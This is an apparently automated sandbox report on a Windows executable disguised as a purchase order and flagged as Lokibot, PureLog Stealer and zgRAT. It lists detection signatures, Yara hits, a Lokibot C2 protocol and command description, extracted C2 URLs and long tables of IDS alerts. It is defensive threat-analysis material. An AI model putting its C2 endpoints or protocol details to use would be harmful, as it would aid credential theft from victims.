Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPedidodecompra__PO20441__ARIMComponentes.exe

Overview

General Information

Sample name:rPedidodecompra__PO20441__ARIMComponentes.exe
Analysis ID:1541288
MD5:13a22d03a02d5ba40e7865b1595db7a2
SHA1:93fabdf07e6ed1c0316ebb5db63b28e041586e46
SHA256:088bb7500d35c7ab73827301e505660559437479ef46312c3ee08b6253f35953
Tags:exeuser-Porcupine
Infos:

Detection

Lokibot, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Lokibot
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rPedidodecompra__PO20441__ARIMComponentes.exe (PID: 2584 cmdline: "C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe" MD5: 13A22D03A02D5BA40E7865B1595DB7A2)
    • aspnet_compiler.exe (PID: 6128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
SourceRuleDescriptionAuthorStrings
rPedidodecompra__PO20441__ARIMComponentes.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    rPedidodecompra__PO20441__ARIMComponentes.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      rPedidodecompra__PO20441__ARIMComponentes.exeMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x15f07:$s1: file:///
      • 0x15e15:$s2: {11111-22222-10009-11112}
      • 0x15e97:$s3: {11111-22222-50001-00000}
      • 0x14f21:$s4: get_Module
      • 0x14199:$s5: Reverse
      • 0x13fcc:$s6: BlockCopy
      • 0x14280:$s7: ReadByte
      • 0x15f19:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        SourceRuleDescriptionAuthorStrings
        00000002.00000002.3328760940.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x1c1f8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                Click to see the 25 entries
                SourceRuleDescriptionAuthorStrings
                2.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  2.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                    2.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      2.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                      • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                      2.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                      • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                      Click to see the 27 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe", ParentImage: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe, ParentProcessId: 2584, ParentProcessName: rPedidodecompra__PO20441__ARIMComponentes.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 6128, ProcessName: aspnet_compiler.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:02:07.687491+020020243121A Network Trojan was detected192.168.2.549704188.114.96.380TCP
                      2024-10-24T17:02:08.867503+020020243121A Network Trojan was detected192.168.2.549705188.114.96.380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:02:06.733299+020020253811Malware Command and Control Activity Detected192.168.2.549704188.114.96.380TCP
                      2024-10-24T17:02:07.830536+020020253811Malware Command and Control Activity Detected192.168.2.549705188.114.96.380TCP
                      2024-10-24T17:02:08.934078+020020253811Malware Command and Control Activity Detected192.168.2.549706188.114.96.380TCP
                      2024-10-24T17:02:10.185322+020020253811Malware Command and Control Activity Detected192.168.2.549707188.114.96.380TCP
                      2024-10-24T17:02:11.235526+020020253811Malware Command and Control Activity Detected192.168.2.549708188.114.96.380TCP
                      2024-10-24T17:02:12.361135+020020253811Malware Command and Control Activity Detected192.168.2.549709188.114.96.380TCP
                      2024-10-24T17:02:13.549321+020020253811Malware Command and Control Activity Detected192.168.2.549710188.114.96.380TCP
                      2024-10-24T17:02:17.079419+020020253811Malware Command and Control Activity Detected192.168.2.549717188.114.96.380TCP
                      2024-10-24T17:02:20.619456+020020253811Malware Command and Control Activity Detected192.168.2.549735188.114.96.380TCP
                      2024-10-24T17:02:21.691587+020020253811Malware Command and Control Activity Detected192.168.2.549745188.114.96.380TCP
                      2024-10-24T17:02:23.211146+020020253811Malware Command and Control Activity Detected192.168.2.549757188.114.96.380TCP
                      2024-10-24T17:02:24.561675+020020253811Malware Command and Control Activity Detected192.168.2.549763188.114.96.380TCP
                      2024-10-24T17:02:25.747925+020020253811Malware Command and Control Activity Detected192.168.2.549774188.114.96.380TCP
                      2024-10-24T17:02:26.794870+020020253811Malware Command and Control Activity Detected192.168.2.549780188.114.96.380TCP
                      2024-10-24T17:02:27.825461+020020253811Malware Command and Control Activity Detected192.168.2.549786188.114.96.380TCP
                      2024-10-24T17:02:28.879212+020020253811Malware Command and Control Activity Detected192.168.2.549792188.114.96.380TCP
                      2024-10-24T17:02:29.936630+020020253811Malware Command and Control Activity Detected192.168.2.549798188.114.96.380TCP
                      2024-10-24T17:02:31.015360+020020253811Malware Command and Control Activity Detected192.168.2.549806188.114.96.380TCP
                      2024-10-24T17:02:33.298933+020020253811Malware Command and Control Activity Detected192.168.2.549820188.114.96.380TCP
                      2024-10-24T17:02:34.372256+020020253811Malware Command and Control Activity Detected192.168.2.549826188.114.96.380TCP
                      2024-10-24T17:02:35.421423+020020253811Malware Command and Control Activity Detected192.168.2.549832188.114.96.380TCP
                      2024-10-24T17:02:37.545568+020020253811Malware Command and Control Activity Detected192.168.2.549845188.114.96.380TCP
                      2024-10-24T17:02:38.638011+020020253811Malware Command and Control Activity Detected192.168.2.549853188.114.96.380TCP
                      2024-10-24T17:02:39.658318+020020253811Malware Command and Control Activity Detected192.168.2.549859188.114.96.380TCP
                      2024-10-24T17:02:40.998847+020020253811Malware Command and Control Activity Detected192.168.2.549866188.114.96.380TCP
                      2024-10-24T17:02:42.218170+020020253811Malware Command and Control Activity Detected192.168.2.549875188.114.96.380TCP
                      2024-10-24T17:02:43.317732+020020253811Malware Command and Control Activity Detected192.168.2.549881188.114.96.380TCP
                      2024-10-24T17:02:45.544944+020020253811Malware Command and Control Activity Detected192.168.2.549893188.114.96.380TCP
                      2024-10-24T17:02:46.580422+020020253811Malware Command and Control Activity Detected192.168.2.549899188.114.96.380TCP
                      2024-10-24T17:02:47.796961+020020253811Malware Command and Control Activity Detected192.168.2.549907188.114.96.380TCP
                      2024-10-24T17:02:51.046250+020020253811Malware Command and Control Activity Detected192.168.2.549925188.114.96.380TCP
                      2024-10-24T17:02:53.656102+020020253811Malware Command and Control Activity Detected192.168.2.549941188.114.96.380TCP
                      2024-10-24T17:02:58.245581+020020253811Malware Command and Control Activity Detected192.168.2.549963188.114.96.380TCP
                      2024-10-24T17:02:59.443401+020020253811Malware Command and Control Activity Detected192.168.2.549968188.114.96.380TCP
                      2024-10-24T17:03:00.546134+020020253811Malware Command and Control Activity Detected192.168.2.549972188.114.96.380TCP
                      2024-10-24T17:03:01.672985+020020253811Malware Command and Control Activity Detected192.168.2.549976188.114.96.380TCP
                      2024-10-24T17:03:04.124054+020020253811Malware Command and Control Activity Detected192.168.2.549980188.114.96.380TCP
                      2024-10-24T17:03:05.169370+020020253811Malware Command and Control Activity Detected192.168.2.549983188.114.96.380TCP
                      2024-10-24T17:03:06.232216+020020253811Malware Command and Control Activity Detected192.168.2.549987188.114.96.380TCP
                      2024-10-24T17:03:07.418539+020020253811Malware Command and Control Activity Detected192.168.2.549990188.114.96.380TCP
                      2024-10-24T17:03:08.919860+020020253811Malware Command and Control Activity Detected192.168.2.549995188.114.96.380TCP
                      2024-10-24T17:03:11.777745+020020253811Malware Command and Control Activity Detected192.168.2.550002188.114.96.380TCP
                      2024-10-24T17:03:15.310031+020020253811Malware Command and Control Activity Detected192.168.2.550010188.114.96.380TCP
                      2024-10-24T17:03:16.352682+020020253811Malware Command and Control Activity Detected192.168.2.550013188.114.96.380TCP
                      2024-10-24T17:03:17.420331+020020253811Malware Command and Control Activity Detected192.168.2.550019188.114.96.380TCP
                      2024-10-24T17:03:18.620369+020020253811Malware Command and Control Activity Detected192.168.2.550022188.114.96.380TCP
                      2024-10-24T17:03:19.829825+020020253811Malware Command and Control Activity Detected192.168.2.550023188.114.96.380TCP
                      2024-10-24T17:03:20.922651+020020253811Malware Command and Control Activity Detected192.168.2.550024188.114.96.380TCP
                      2024-10-24T17:03:21.973153+020020253811Malware Command and Control Activity Detected192.168.2.550025188.114.96.380TCP
                      2024-10-24T17:03:23.325611+020020253811Malware Command and Control Activity Detected192.168.2.550026188.114.96.380TCP
                      2024-10-24T17:03:24.421552+020020253811Malware Command and Control Activity Detected192.168.2.550027188.114.96.380TCP
                      2024-10-24T17:03:26.571665+020020253811Malware Command and Control Activity Detected192.168.2.550028188.114.96.380TCP
                      2024-10-24T17:03:29.956285+020020253811Malware Command and Control Activity Detected192.168.2.550029188.114.96.380TCP
                      2024-10-24T17:03:31.134751+020020253811Malware Command and Control Activity Detected192.168.2.550030188.114.96.380TCP
                      2024-10-24T17:03:32.261893+020020253811Malware Command and Control Activity Detected192.168.2.550031188.114.96.380TCP
                      2024-10-24T17:03:33.465689+020020253811Malware Command and Control Activity Detected192.168.2.550032188.114.96.380TCP
                      2024-10-24T17:03:35.059300+020020253811Malware Command and Control Activity Detected192.168.2.550033188.114.96.380TCP
                      2024-10-24T17:03:36.887347+020020253811Malware Command and Control Activity Detected192.168.2.550034188.114.96.380TCP
                      2024-10-24T17:03:38.921832+020020253811Malware Command and Control Activity Detected192.168.2.550035188.114.96.380TCP
                      2024-10-24T17:03:40.811483+020020253811Malware Command and Control Activity Detected192.168.2.550036188.114.96.380TCP
                      2024-10-24T17:03:41.883240+020020253811Malware Command and Control Activity Detected192.168.2.550037188.114.96.380TCP
                      2024-10-24T17:03:43.376184+020020253811Malware Command and Control Activity Detected192.168.2.550038188.114.96.380TCP
                      2024-10-24T17:03:44.476668+020020253811Malware Command and Control Activity Detected192.168.2.550039188.114.96.380TCP
                      2024-10-24T17:03:46.083585+020020253811Malware Command and Control Activity Detected192.168.2.550040188.114.96.380TCP
                      2024-10-24T17:03:49.605447+020020253811Malware Command and Control Activity Detected192.168.2.550041188.114.96.380TCP
                      2024-10-24T17:03:51.419744+020020253811Malware Command and Control Activity Detected192.168.2.550042188.114.96.380TCP
                      2024-10-24T17:03:53.091767+020020253811Malware Command and Control Activity Detected192.168.2.550043188.114.96.380TCP
                      2024-10-24T17:03:56.917338+020020253811Malware Command and Control Activity Detected192.168.2.550044188.114.96.380TCP
                      2024-10-24T17:03:58.513507+020020253811Malware Command and Control Activity Detected192.168.2.550045188.114.96.380TCP
                      2024-10-24T17:04:03.807044+020020253811Malware Command and Control Activity Detected192.168.2.550046188.114.96.380TCP
                      2024-10-24T17:04:04.868950+020020253811Malware Command and Control Activity Detected192.168.2.550047188.114.96.380TCP
                      2024-10-24T17:04:06.395715+020020253811Malware Command and Control Activity Detected192.168.2.550048188.114.96.380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:01:59.827885+020020254831A Network Trojan was detected188.114.96.380192.168.2.549845TCP
                      2024-10-24T17:01:59.827885+020020254831A Network Trojan was detected188.114.96.380192.168.2.549826TCP
                      2024-10-24T17:02:10.030314+020020254831A Network Trojan was detected188.114.96.380192.168.2.549706TCP
                      2024-10-24T17:02:11.088434+020020254831A Network Trojan was detected188.114.96.380192.168.2.549707TCP
                      2024-10-24T17:02:12.214201+020020254831A Network Trojan was detected188.114.96.380192.168.2.549708TCP
                      2024-10-24T17:02:13.394166+020020254831A Network Trojan was detected188.114.96.380192.168.2.549709TCP
                      2024-10-24T17:02:16.928848+020020254831A Network Trojan was detected188.114.96.380192.168.2.549710TCP
                      2024-10-24T17:02:20.453090+020020254831A Network Trojan was detected188.114.96.380192.168.2.549717TCP
                      2024-10-24T17:02:21.539727+020020254831A Network Trojan was detected188.114.96.380192.168.2.549735TCP
                      2024-10-24T17:02:22.999018+020020254831A Network Trojan was detected188.114.96.380192.168.2.549745TCP
                      2024-10-24T17:02:24.418373+020020254831A Network Trojan was detected188.114.96.380192.168.2.549757TCP
                      2024-10-24T17:02:25.594776+020020254831A Network Trojan was detected188.114.96.380192.168.2.549763TCP
                      2024-10-24T17:02:26.643572+020020254831A Network Trojan was detected188.114.96.380192.168.2.549774TCP
                      2024-10-24T17:02:27.675985+020020254831A Network Trojan was detected188.114.96.380192.168.2.549780TCP
                      2024-10-24T17:02:28.723928+020020254831A Network Trojan was detected188.114.96.380192.168.2.549786TCP
                      2024-10-24T17:02:29.787110+020020254831A Network Trojan was detected188.114.96.380192.168.2.549792TCP
                      2024-10-24T17:02:30.862976+020020254831A Network Trojan was detected188.114.96.380192.168.2.549798TCP
                      2024-10-24T17:02:33.141972+020020254831A Network Trojan was detected188.114.96.380192.168.2.549806TCP
                      2024-10-24T17:02:34.219047+020020254831A Network Trojan was detected188.114.96.380192.168.2.549820TCP
                      2024-10-24T17:02:37.397824+020020254831A Network Trojan was detected188.114.96.380192.168.2.549832TCP
                      2024-10-24T17:02:39.510265+020020254831A Network Trojan was detected188.114.96.380192.168.2.549853TCP
                      2024-10-24T17:02:40.712629+020020254831A Network Trojan was detected188.114.96.380192.168.2.549859TCP
                      2024-10-24T17:02:42.068199+020020254831A Network Trojan was detected188.114.96.380192.168.2.549866TCP
                      2024-10-24T17:02:43.143302+020020254831A Network Trojan was detected188.114.96.380192.168.2.549875TCP
                      2024-10-24T17:02:45.397964+020020254831A Network Trojan was detected188.114.96.380192.168.2.549881TCP
                      2024-10-24T17:02:46.421855+020020254831A Network Trojan was detected188.114.96.380192.168.2.549893TCP
                      2024-10-24T17:02:47.648909+020020254831A Network Trojan was detected188.114.96.380192.168.2.549899TCP
                      2024-10-24T17:02:50.902069+020020254831A Network Trojan was detected188.114.96.380192.168.2.549907TCP
                      2024-10-24T17:02:53.499004+020020254831A Network Trojan was detected188.114.96.380192.168.2.549925TCP
                      2024-10-24T17:02:58.103765+020020254831A Network Trojan was detected188.114.96.380192.168.2.549941TCP
                      2024-10-24T17:02:59.282996+020020254831A Network Trojan was detected188.114.96.380192.168.2.549963TCP
                      2024-10-24T17:03:00.374881+020020254831A Network Trojan was detected188.114.96.380192.168.2.549968TCP
                      2024-10-24T17:03:01.528668+020020254831A Network Trojan was detected188.114.96.380192.168.2.549972TCP
                      2024-10-24T17:03:03.977388+020020254831A Network Trojan was detected188.114.96.380192.168.2.549976TCP
                      2024-10-24T17:03:05.027946+020020254831A Network Trojan was detected188.114.96.380192.168.2.549980TCP
                      2024-10-24T17:03:06.088782+020020254831A Network Trojan was detected188.114.96.380192.168.2.549983TCP
                      2024-10-24T17:03:07.280784+020020254831A Network Trojan was detected188.114.96.380192.168.2.549987TCP
                      2024-10-24T17:03:08.767099+020020254831A Network Trojan was detected188.114.96.380192.168.2.549990TCP
                      2024-10-24T17:03:11.609453+020020254831A Network Trojan was detected188.114.96.380192.168.2.549995TCP
                      2024-10-24T17:03:15.153010+020020254831A Network Trojan was detected188.114.96.380192.168.2.550002TCP
                      2024-10-24T17:03:16.212370+020020254831A Network Trojan was detected188.114.96.380192.168.2.550010TCP
                      2024-10-24T17:03:17.269422+020020254831A Network Trojan was detected188.114.96.380192.168.2.550013TCP
                      2024-10-24T17:03:18.480624+020020254831A Network Trojan was detected188.114.96.380192.168.2.550019TCP
                      2024-10-24T17:03:19.671516+020020254831A Network Trojan was detected188.114.96.380192.168.2.550022TCP
                      2024-10-24T17:03:20.776248+020020254831A Network Trojan was detected188.114.96.380192.168.2.550023TCP
                      2024-10-24T17:03:21.815600+020020254831A Network Trojan was detected188.114.96.380192.168.2.550024TCP
                      2024-10-24T17:03:23.178818+020020254831A Network Trojan was detected188.114.96.380192.168.2.550025TCP
                      2024-10-24T17:03:24.277018+020020254831A Network Trojan was detected188.114.96.380192.168.2.550026TCP
                      2024-10-24T17:03:26.411090+020020254831A Network Trojan was detected188.114.96.380192.168.2.550027TCP
                      2024-10-24T17:03:29.677638+020020254831A Network Trojan was detected188.114.96.380192.168.2.550028TCP
                      2024-10-24T17:03:30.980283+020020254831A Network Trojan was detected188.114.96.380192.168.2.550029TCP
                      2024-10-24T17:03:32.103057+020020254831A Network Trojan was detected188.114.96.380192.168.2.550030TCP
                      2024-10-24T17:03:33.262858+020020254831A Network Trojan was detected188.114.96.380192.168.2.550031TCP
                      2024-10-24T17:03:34.913154+020020254831A Network Trojan was detected188.114.96.380192.168.2.550032TCP
                      2024-10-24T17:03:36.737558+020020254831A Network Trojan was detected188.114.96.380192.168.2.550033TCP
                      2024-10-24T17:03:38.773124+020020254831A Network Trojan was detected188.114.96.380192.168.2.550034TCP
                      2024-10-24T17:03:40.384389+020020254831A Network Trojan was detected188.114.96.380192.168.2.550035TCP
                      2024-10-24T17:03:41.729284+020020254831A Network Trojan was detected188.114.96.380192.168.2.550036TCP
                      2024-10-24T17:03:43.227867+020020254831A Network Trojan was detected188.114.96.380192.168.2.550037TCP
                      2024-10-24T17:03:44.272391+020020254831A Network Trojan was detected188.114.96.380192.168.2.550038TCP
                      2024-10-24T17:03:45.907116+020020254831A Network Trojan was detected188.114.96.380192.168.2.550039TCP
                      2024-10-24T17:03:49.452542+020020254831A Network Trojan was detected188.114.96.380192.168.2.550040TCP
                      2024-10-24T17:03:51.264591+020020254831A Network Trojan was detected188.114.96.380192.168.2.550041TCP
                      2024-10-24T17:03:52.950650+020020254831A Network Trojan was detected188.114.96.380192.168.2.550042TCP
                      2024-10-24T17:03:56.764327+020020254831A Network Trojan was detected188.114.96.380192.168.2.550043TCP
                      2024-10-24T17:03:58.367518+020020254831A Network Trojan was detected188.114.96.380192.168.2.550044TCP
                      2024-10-24T17:04:03.640563+020020254831A Network Trojan was detected188.114.96.380192.168.2.550045TCP
                      2024-10-24T17:04:04.701192+020020254831A Network Trojan was detected188.114.96.380192.168.2.550046TCP
                      2024-10-24T17:04:06.233149+020020254831A Network Trojan was detected188.114.96.380192.168.2.550047TCP
                      2024-10-24T17:04:07.737626+020020254831A Network Trojan was detected188.114.96.380192.168.2.550048TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:02:10.024741+020020243131Malware Command and Control Activity Detected192.168.2.549706188.114.96.380TCP
                      2024-10-24T17:02:11.080802+020020243131Malware Command and Control Activity Detected192.168.2.549707188.114.96.380TCP
                      2024-10-24T17:02:12.208821+020020243131Malware Command and Control Activity Detected192.168.2.549708188.114.96.380TCP
                      2024-10-24T17:02:13.387417+020020243131Malware Command and Control Activity Detected192.168.2.549709188.114.96.380TCP
                      2024-10-24T17:02:16.923354+020020243131Malware Command and Control Activity Detected192.168.2.549710188.114.96.380TCP
                      2024-10-24T17:02:20.447398+020020243131Malware Command and Control Activity Detected192.168.2.549717188.114.96.380TCP
                      2024-10-24T17:02:21.532098+020020243131Malware Command and Control Activity Detected192.168.2.549735188.114.96.380TCP
                      2024-10-24T17:02:22.993659+020020243131Malware Command and Control Activity Detected192.168.2.549745188.114.96.380TCP
                      2024-10-24T17:02:24.412934+020020243131Malware Command and Control Activity Detected192.168.2.549757188.114.96.380TCP
                      2024-10-24T17:02:25.588806+020020243131Malware Command and Control Activity Detected192.168.2.549763188.114.96.380TCP
                      2024-10-24T17:02:26.637709+020020243131Malware Command and Control Activity Detected192.168.2.549774188.114.96.380TCP
                      2024-10-24T17:02:27.669186+020020243131Malware Command and Control Activity Detected192.168.2.549780188.114.96.380TCP
                      2024-10-24T17:02:28.718139+020020243131Malware Command and Control Activity Detected192.168.2.549786188.114.96.380TCP
                      2024-10-24T17:02:29.781591+020020243131Malware Command and Control Activity Detected192.168.2.549792188.114.96.380TCP
                      2024-10-24T17:02:30.857303+020020243131Malware Command and Control Activity Detected192.168.2.549798188.114.96.380TCP
                      2024-10-24T17:02:33.136591+020020243131Malware Command and Control Activity Detected192.168.2.549806188.114.96.380TCP
                      2024-10-24T17:02:34.213681+020020243131Malware Command and Control Activity Detected192.168.2.549820188.114.96.380TCP
                      2024-10-24T17:02:35.272272+020020243131Malware Command and Control Activity Detected192.168.2.549826188.114.96.380TCP
                      2024-10-24T17:02:37.391379+020020243131Malware Command and Control Activity Detected192.168.2.549832188.114.96.380TCP
                      2024-10-24T17:02:38.478307+020020243131Malware Command and Control Activity Detected192.168.2.549845188.114.96.380TCP
                      2024-10-24T17:02:39.504866+020020243131Malware Command and Control Activity Detected192.168.2.549853188.114.96.380TCP
                      2024-10-24T17:02:40.706963+020020243131Malware Command and Control Activity Detected192.168.2.549859188.114.96.380TCP
                      2024-10-24T17:02:42.062394+020020243131Malware Command and Control Activity Detected192.168.2.549866188.114.96.380TCP
                      2024-10-24T17:02:43.137633+020020243131Malware Command and Control Activity Detected192.168.2.549875188.114.96.380TCP
                      2024-10-24T17:02:45.392280+020020243131Malware Command and Control Activity Detected192.168.2.549881188.114.96.380TCP
                      2024-10-24T17:02:46.416414+020020243131Malware Command and Control Activity Detected192.168.2.549893188.114.96.380TCP
                      2024-10-24T17:02:47.642217+020020243131Malware Command and Control Activity Detected192.168.2.549899188.114.96.380TCP
                      2024-10-24T17:02:50.896699+020020243131Malware Command and Control Activity Detected192.168.2.549907188.114.96.380TCP
                      2024-10-24T17:02:53.493288+020020243131Malware Command and Control Activity Detected192.168.2.549925188.114.96.380TCP
                      2024-10-24T17:02:58.098284+020020243131Malware Command and Control Activity Detected192.168.2.549941188.114.96.380TCP
                      2024-10-24T17:02:59.277600+020020243131Malware Command and Control Activity Detected192.168.2.549963188.114.96.380TCP
                      2024-10-24T17:03:00.368673+020020243131Malware Command and Control Activity Detected192.168.2.549968188.114.96.380TCP
                      2024-10-24T17:03:01.522800+020020243131Malware Command and Control Activity Detected192.168.2.549972188.114.96.380TCP
                      2024-10-24T17:03:03.971789+020020243131Malware Command and Control Activity Detected192.168.2.549976188.114.96.380TCP
                      2024-10-24T17:03:05.022507+020020243131Malware Command and Control Activity Detected192.168.2.549980188.114.96.380TCP
                      2024-10-24T17:03:06.083279+020020243131Malware Command and Control Activity Detected192.168.2.549983188.114.96.380TCP
                      2024-10-24T17:03:07.269902+020020243131Malware Command and Control Activity Detected192.168.2.549987188.114.96.380TCP
                      2024-10-24T17:03:08.761558+020020243131Malware Command and Control Activity Detected192.168.2.549990188.114.96.380TCP
